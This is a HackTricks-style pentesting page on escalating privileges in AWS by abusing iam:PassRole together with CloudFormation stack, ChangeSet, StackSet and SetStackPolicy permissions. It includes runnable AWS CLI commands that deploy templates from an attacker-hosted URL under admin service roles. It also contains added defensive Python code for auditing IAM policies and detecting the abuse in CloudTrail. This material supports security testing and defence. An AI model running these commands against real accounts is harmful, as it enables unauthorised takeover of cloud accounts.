Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information about cloudformation check:
{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %} aws-cloudformation-and-codestar-enum.md {% endcontent-ref %}
An attacker with the iam:PassRole and cloudformation:CreateStack permissions would be able to escalate privileges by creating a CloudFormation template that performs actions and creates resources using the permissions of the role passed when creating the CloudFormation stack.
```bash
aws cloudformation create-stack --stack-name my_stack \
    --template-url http://my-website.com/my-malicious-template.template \
    --role-arn arn_of_cloudformation_service_role
```
Here the template hosted on the attacker's website includes directions to perform malicious actions, such as creating an administrator user and then using those credentials to escalate their own access.
The following page has an exploitation example with the additional permission cloudformation:DescribeStacks:
{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {% endcontent-ref %}
Potential Impact: Privesc to the cloudformation service role specified.
With iam:PassRole and cloudformation:UpdateStack you can abuse an existing CloudFormation stack by updating it, escalating privileges as in the previous scenario:
```bash
# The CLI flag for the service role is --role-arn
aws cloudformation update-stack \
    --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role-arn arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1
```
The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.
Potential Impact: Privesc to the cloudformation service role specified.
If you have cloudformation:UpdateStack but no iam:PassRole, you can still update existing stacks and abuse the IAM roles they already have attached. Check the previous section for an exploit example (just don't specify any role in the update).
The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.
Potential Impact: Privesc to the cloudformation service role already attached.
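The three scenarios above hinge on what a principal holds: an iam:PassRole that is not scoped to specific roles, or a stack-mutating CloudFormation action that can reuse a role already attached to a stack. As an added, defender-side example (not code from the original page), this Python function audits an IAM policy document for both paths; the sample policy and the role ARNs in it are constructed.

```python
import fnmatch

# Stack-mutating CloudFormation actions that run a template under a service role.
# ATTACHED is the subset that works on an existing stack without any iam:PassRole.
ALL_ACTIONS = ("cloudformation:CreateStack", "cloudformation:UpdateStack",
               "cloudformation:CreateChangeSet", "cloudformation:ExecuteChangeSet",
               "cloudformation:SetStackPolicy", "cloudformation:CreateStackSet",
               "cloudformation:UpdateStackSet")
ATTACHED = ALL_ACTIONS[1:5] + ALL_ACTIONS[6:]  # all but CreateStack and CreateStackSet

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _allow_statements(policy):
    # Yield (action_pattern, resources, condition) from each Allow statement.
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") == "Allow" and "Action" in st:
            for act in _as_list(st["Action"]):
                yield act, _as_list(st.get("Resource", "*")), st.get("Condition", {})

def _covers(pattern, action):
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())

def _broad_passrole(resources, condition):
    # Broad = Resource "*" or a wildcard in the role name. A positive iam:PassedToService
    # condition that excludes cloudformation.amazonaws.com closes the path; negated
    # operators (StringNotEquals, ...) are not evaluated and count as no restriction.
    if not any(r == "*" or "*" in r.rsplit(":role/", 1)[-1] for r in resources):
        return False
    for op, kv in condition.items():
        for key, val in kv.items():
            if key.lower() == "iam:passedtoservice" and "not" not in op.lower():
                return any(fnmatch.fnmatchcase("cloudformation.amazonaws.com", v.lower())
                           for v in _as_list(val))
    return True

def find_cfn_privesc_paths(policy):
    """Return {'pass_role': [...], 'attached_role': [...]}: CloudFormation actions that
    form an escalation path together with an unscoped iam:PassRole, and actions that can
    reuse a role already attached to an existing stack (no PassRole needed)."""
    stmts = list(_allow_statements(policy))
    reachable = [a for a in ALL_ACTIONS if any(_covers(p, a) for p, _, _ in stmts)]
    broad = any(_covers(p, "iam:PassRole") and _broad_passrole(r, c) for p, r, c in stmts)
    return {"pass_role": sorted(reachable) if broad else [],
            "attached_role": sorted(a for a in reachable if a in ATTACHED)}

# Constructed sample: the iam:PassRole + cloudformation:CreateStack combination from the text.
PERMISSIVE = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
    "Action": ["iam:PassRole", "cloudformation:CreateStack"], "Resource": "*"}]}
```

Scoping the PassRole Resource to the specific deployment roles a team needs (or limiting iam:PassedToService to a service other than CloudFormation) empties the pass_role list; the attached_role list only goes away by removing the update-type actions themselves.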
iam:PassRole, ((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)
An attacker with permissions to pass a role and to create and execute a ChangeSet can create or update a CloudFormation stack and abuse the CloudFormation service roles, just as with CreateStack or UpdateStack.
The following exploit is a variation of the CreateStack one, using the ChangeSet permissions to create a stack.
```bash
# The CLI flag for the service role is --role-arn
aws cloudformation create-change-set \
    --stack-name privesc \
    --change-set-name privesc \
    --change-set-type CREATE \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role-arn arn:aws:iam::947247140022:role/CloudFormationAdmin \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
    --change-set-name privesc \
    --stack-name privesc \
    --region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
    --stack-name privesc \
    --region eu-west-1
```
The cloudformation:SetStackPolicy permission can be used to give yourself ChangeSet permissions over a stack and perform the attack.
Potential Impact: Privesc to cloudformation service roles.
This is like the previous method without passing IAM roles, so you can only abuse the ones already attached; just change the parameter to `--change-set-type UPDATE`.
Potential Impact: Privesc to the cloudformation service role already attached.
An attacker could abuse these permissions (passing a role when creating or updating StackSets) to abuse arbitrary CloudFormation roles.
Potential Impact: Privesc to cloudformation service roles.
An attacker could abuse this permission without iam:PassRole to update StackSets and abuse the CloudFormation roles already attached to them.
Potential Impact: Privesc to the attached cloudformation roles.
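Every variant on this page leaves the same footprint in CloudTrail: a stack, ChangeSet or StackSet call that either passes a role ARN or relies on one already attached, sometimes preceded by SetStackPolicy. As an added defender-side example (not from the original page), this Python detection runs over constructed sample records and flags all three patterns; the CloudTrail field names and the approved-role list are assumptions to verify against your own trail.

```python
import json
from datetime import datetime, timezone

# Constructed CloudTrail records (sample data, not real logs), trimmed to the fields used.
# Field names (roleARN, capabilities, stackName) are assumed to match CloudFormation's
# CloudTrail requestParameters; check them against a record from your own trail.
SAMPLE_EVENTS = """
{"eventTime":"2023-01-01T10:00:00Z","eventSource":"cloudformation.amazonaws.com","eventName":"SetStackPolicy","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"requestParameters":{"stackName":"privesc"}}
{"eventTime":"2023-01-01T10:01:00Z","eventSource":"cloudformation.amazonaws.com","eventName":"UpdateStack","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"requestParameters":{"stackName":"privesc","templateURL":"https://example-bucket.s3.amazonaws.com/t.json","capabilities":["CAPABILITY_IAM"]}}
{"eventTime":"2023-01-01T10:05:00Z","eventSource":"cloudformation.amazonaws.com","eventName":"CreateStack","userIdentity":{"arn":"arn:aws:iam::123456789012:role/ci-deployer"},"requestParameters":{"stackName":"app","roleARN":"arn:aws:iam::123456789012:role/CfnDeployLowPriv","capabilities":["CAPABILITY_IAM"]}}
{"eventTime":"2023-01-01T10:06:00Z","eventSource":"cloudformation.amazonaws.com","eventName":"CreateChangeSet","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"requestParameters":{"stackName":"privesc","changeSetType":"CREATE","roleARN":"arn:aws:iam::123456789012:role/CloudFormationAdmin","capabilities":["CAPABILITY_IAM"]}}
{"eventTime":"2023-01-01T10:07:00Z","eventSource":"s3.amazonaws.com","eventName":"GetObject","userIdentity":{"arn":"arn:aws:iam::123456789012:user/dev"},"requestParameters":{"bucketName":"example-bucket"}}
"""

MUTATING = {"CreateStack", "UpdateStack", "CreateChangeSet", "CreateStackSet", "UpdateStackSet"}
IAM_CAPS = {"CAPABILITY_IAM", "CAPABILITY_NAMED_IAM"}

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def detect_cfn_role_abuse(events_text, approved_roles, window_s=900):
    """Return (rule, principal, stack, detail) tuples for: a non-approved role passed to
    a stack call; an attached role reused to create IAM resources (no role passed, IAM
    capability set); a stack call within window_s of SetStackPolicy by the same principal."""
    events = sorted((json.loads(l) for l in events_text.splitlines() if l.strip()),
                    key=lambda e: e["eventTime"])
    last_policy_change = {}  # (principal, stack) -> time of the latest SetStackPolicy
    findings = []
    for ev in events:
        if ev.get("eventSource") != "cloudformation.amazonaws.com":
            continue
        name, who = ev["eventName"], ev["userIdentity"]["arn"]
        req = ev.get("requestParameters") or {}
        stack = req.get("stackName") or req.get("stackSetName", "?")
        when = _ts(ev["eventTime"])
        if name == "SetStackPolicy":  # precursor: unlocking a stack for later updates
            last_policy_change[(who, stack)] = when
            continue
        if name not in MUTATING:
            continue
        role = req.get("roleARN")
        if role and role not in approved_roles:
            findings.append(("passed-unapproved-role", who, stack, role))
        elif not role and IAM_CAPS & set(req.get("capabilities", [])):
            findings.append(("attached-role-iam-change", who, stack, name))
        prior = last_policy_change.get((who, stack))
        if prior and (when - prior).total_seconds() <= window_s:
            findings.append(("setstackpolicy-then-mutate", who, stack, name))
    return findings
```

On the sample data the CI role passing its approved deployment role produces nothing, while the user that sets a stack policy and then updates the stack, and later passes an unapproved admin role to a ChangeSet, produces four findings.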